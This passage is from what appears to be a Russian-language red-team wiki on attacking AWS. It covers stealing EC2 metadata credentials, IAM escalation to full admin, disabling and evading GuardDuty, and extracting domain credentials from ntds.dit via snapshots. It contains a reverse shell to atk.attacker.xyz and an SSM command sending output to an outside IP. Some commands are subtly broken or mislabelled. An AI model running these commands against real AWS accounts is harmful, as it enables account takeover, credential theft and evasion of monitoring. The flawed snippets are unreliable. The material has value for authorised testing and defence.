TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
